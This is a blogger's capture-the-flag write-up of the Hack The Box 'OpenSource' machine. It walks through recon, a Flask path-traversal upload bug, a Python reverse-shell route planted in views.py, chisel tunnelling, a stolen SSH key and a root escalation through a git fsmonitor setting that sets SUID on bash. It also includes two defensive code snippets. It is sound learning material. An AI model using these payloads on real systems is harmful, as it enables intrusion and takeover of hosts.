HTB OpenSource Review
Flow

Reference links

https://blog.csdn.net/Purpose_7/article/details/128707843

https://medium.com/@joemcfarland/hack-the-box-opensource-writeup-96d1671b8d78

Official writeup

Information gathering

└─# nmap -A -p- --min-rate=1000 -T4 10.10.11.164  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 03:49 PDT
Warning: 10.10.11.164 giving up on port because retransmission cap hit (6).
Stats: 0:04:34 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 03:55 (0:01:25 remaining)
Nmap scan report for 10.10.11.164
Host is up (0.51s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
| 256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_ 256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp open http Werkzeug/2.1.2 Python/3.10.3
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.1.2 Python/3.10.3
| Date: Wed, 11 Sep 2024 10:42:24 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 5316
| Connection: close
| <html lang="en">
| <head>
。。。
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
|_http-title: upcloud - Upload files for Free!
3000/tcp filtered ppp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=9/11%Time=66E1767F%P=aarch64-unknown-linux-g
SF:nu%r(GetRequest,1573,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.
。。。
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 554.57 ms 10.10.16.1
2 391.34 ms 10.10.11.164

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 357.94 seconds

Start with port 80: there are /upcloud, /download and /uploads. The app is Flask, so PHP was not an option at the upload point. Uploading a .py file and requesting it did not execute anything on the server, so that was dropped. The Werkzeug/2.1.2 version found by nmap has no obviously usable vulnerability, so that was dropped too. Accessing /console directly requires a PIN, which was not found.

Going to /download automatically downloads a source.zip; unzip it and there is a .git directory.

Looking at the git log, note that it points at the public branch; check whether there are other branches.

There is a dev branch; switch to it and there are new log entries:

┌──(root㉿kali)-[/home/kali/Downloads/source]
└─# git branch
dev
* public

┌──(root㉿kali)-[/home/kali/Downloads/source]
└─# git checkout dev
Already on 'dev'

┌──(root㉿kali)-[/home/kali/Downloads/source]
└─# git log
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev, switch)
Author: gituser <gituser@local>
Date: Thu Apr 28 13:47:24 2022 +0200

ease testing

commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date: Thu Apr 28 13:46:54 2022 +0200

added gitignore

commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date: Thu Apr 28 13:46:16 2022 +0200

updated

commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date: Thu Apr 28 13:45:17 2022 +0200

initial

Digging through the history reveals a password for the user dev01; trying it directly against SSH fails.

Foothold

Look at the other files in source. In source/app/app/views.py is the file-upload logic:

import os
from flask import request, render_template, send_file

# `app` and get_file_name() are defined elsewhere in views.py and are not shown here.

@app.route('/upcloud', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        # The user-controlled name is joined directly onto the upload directory.
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')


@app.route('/uploads/<path:path>')
def send_report(path):
    path = get_file_name(path)
    # Same join pattern on the download side.
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))

Other writeups explain that this is os.path.join with no filtering, just direct concatenation: if the filename begins with a slash, os.path.join discards the path components before it and uses the filename as the whole path.

Official writeup demonstration

So we exploit this: change the filename to /app/app/views.py (by intercepting the upload request) to overwrite the original views.py, and add a new route to it to get a shell.

Add the following to the new views.py:
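As an added example (not code from the original post or the app itself), the os.path.join behaviour that makes both the upload and download routes exploitable, beside a hardened variant; UPLOAD_ROOT is an assumed stand-in for os.getcwd()/public/uploads:

```python
import os
from typing import Optional

# Assumed upload directory, standing in for os.path.join(os.getcwd(), "public", "uploads").
UPLOAD_ROOT = "/app/public/uploads"


def vulnerable_upload_path(file_name: str) -> str:
    """Mirrors the original views.py: an attacker-supplied name joined as-is.

    os.path.join drops every component before one that is absolute, so a name
    such as "/app/app/views.py" becomes the whole path.
    """
    return os.path.join(UPLOAD_ROOT, file_name)


def safe_upload_path(file_name: str) -> Optional[str]:
    """Hardened variant: a filename must not carry any directory part, and the
    resolved path must still sit inside UPLOAD_ROOT. Returns None on rejection."""
    if not file_name or file_name in (".", "..") or "/" in file_name or "\\" in file_name:
        return None
    root = os.path.realpath(UPLOAD_ROOT)
    candidate = os.path.realpath(os.path.join(root, file_name))
    # Belt and braces: even a name that passed the checks above must resolve under root.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for name in ("cat.png", "/app/app/views.py", "../../etc/passwd"):
        print(f"{name!r}: join -> {vulnerable_upload_path(name)}, safe -> {safe_upload_path(name)}")
```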

@app.route('/revshell/<ip>')
def rev_shell(ip):
    # Connects back to <ip> on port 1234 and attaches a shell to the socket.
    import socket, os, pty
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, 1234))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn("/bin/sh")

Intercept the upload request, change the filename, and upload.

Start a listener locally, then request 10.10.11.164/revshell/10.10.16.2 to get a shell.

Got user.

A .dockerenv file is present, so this is inside Docker. Upload fscan and scan: several IPs are up, and curl-ing them locally returns roughly the same content.

Accessing (with wget) those IPs returns the same content as port 80 earlier, except 172.17.0.1, which has port 3000 open running Gitea. Try to set up a tunnel to forward it out.

chisel is used for this. On Kali:

┌──(root㉿kali)-[/home/kali]
└─# ./chisel_1.10.0_linux_arm64 server -p 8000 --reverse
2024/09/11 04:54:47 server: Reverse tunnelling enabled
2024/09/11 04:54:47 server: Fingerprint TolIpzRv4g1qkoHO0zNMWbtOoAgYjXKucuJrFsfNvBE=
2024/09/11 04:54:47 server: Listening on http://0.0.0.0:8000

On the target:

/tmp # ./chisel_1.10.0_linux_amd64 client 10.10.16.2:8000 R:3000:172.17.0.1:3000
./chisel_1.10.0_linux_amd64 client 10.10.14.6:8000 R:3000:172.17.0.1:3000
2024/09/11 11:47:02 client: Connecting to ws://10.10.14.6:8000

Then browse to 127.0.0.1:3000 on Kali and Gitea appears; the dev01 credentials found in git earlier come into use here.

After logging in, there is a .ssh directory in the repository; id_rsa can be read directly. Copy it, save it locally, log in with it, and get a shell as dev01.

Privilege escalation

After some searching with nothing found, upload pspy64 and run it.

There is a /bin/bash /usr/local/bin/git-sync process (somewhat hard to spot); look at its contents:

dev01@opensource:/tmp$ cat /usr/local/bin/git-sync
#!/bin/bash

cd /home/dev01/

if ! git status --porcelain; then
    echo "No changes"
else
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    git add .
    git commit -m "Backup for ${day}"
    git push origin main
fi

The key point is that git runs inside dev01's home directory, which is a repository dev01 controls. Following the official writeup's approach, we can modify the repository's git config so that git, running as root, indirectly executes what we want.

Write fsmonitor = "chmod 4755 /bin/bash" into ~/.git/config:

dev01@opensource:~/.git$ nano config 
dev01@opensource:~/.git$ cat config
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	fsmonitor = "chmod 4755 /bin/bash"
[remote "origin"]
	url = http://opensource.htb:3000/dev01/home-backup.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
	remote = origin
	merge = refs/heads/main

Wait a moment, then bash -p gives root.
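As an added defender's check (not part of the original writeup or the box), a small parser that reads a .git/config and flags a core.fsmonitor value that is a command rather than a boolean; SAMPLE_CONFIG is a constructed copy of the config shown above:

```python
import re
from typing import List, Tuple

# Constructed sample modelled on the ~/.git/config above, including the injected fsmonitor line.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
\tlogallrefupdates = true
\tfsmonitor = "chmod 4755 /bin/bash"
[remote "origin"]
\turl = http://opensource.htb:3000/dev01/home-backup.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
"""

_SECTION = re.compile(r'^\s*\[([^\]]+)\]\s*$')
_KEYVAL = re.compile(r'^\s*([A-Za-z][\w-]*)\s*=\s*(.*?)\s*$')


def parse_git_config(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) triples; git treats section and key names case-insensitively."""
    triples, section = [], ""
    for line in text.splitlines():
        m = _SECTION.match(line)
        if m:
            section = m.group(1).strip().lower()
            continue
        m = _KEYVAL.match(line)
        if m and section:
            triples.append((section, m.group(1).lower(), m.group(2).strip('"')))
    return triples


def suspicious_fsmonitor(text: str) -> List[str]:
    """core.fsmonitor is either a boolean (built-in daemon) or a command that git
    executes on every status/commit. In a repository that a privileged job like
    git-sync operates on, any non-boolean value is a code-execution path and is returned here."""
    return [
        value
        for section, key, value in parse_git_config(text)
        if section == "core" and key == "fsmonitor" and value.lower() not in ("true", "false")
    ]


if __name__ == "__main__":
    print(suspicious_fsmonitor(SAMPLE_CONFIG))
```

The root cause is the privileged job running git inside a user-writable repository; the check above only surfaces the symptom.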

Summary

Although it is an easy box, it is still quite distinctive, as expected of HTB. (Most of the ideas were actually taken from references; I still hope to have the patience to keep exploring ideas until they succeed.)

This was my first time setting up a tunnel, and I need to really understand how it works. I also don't fully understand the part about finding the host gateway from inside Docker, and the writeups online each explain it differently. The good part is that it helped me review using git. Keep going, stay calm.
